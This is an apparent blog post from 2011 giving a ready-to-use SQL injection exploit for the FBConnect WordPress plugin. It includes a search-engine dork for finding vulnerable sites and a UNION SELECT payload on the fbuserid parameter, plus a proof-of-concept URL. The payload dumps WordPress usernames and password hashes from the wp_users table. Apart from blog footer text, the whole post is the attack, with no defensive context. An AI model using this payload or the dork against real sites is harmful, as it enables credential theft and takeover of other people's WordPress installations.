App : FBConnect WordPress Plugin
Type : Sql-Injection
Dork : inurl:"fbconnect_action=myhome"
Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--
PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--
Selasa, 05 April 2011
Langganan:
Postingan (Atom)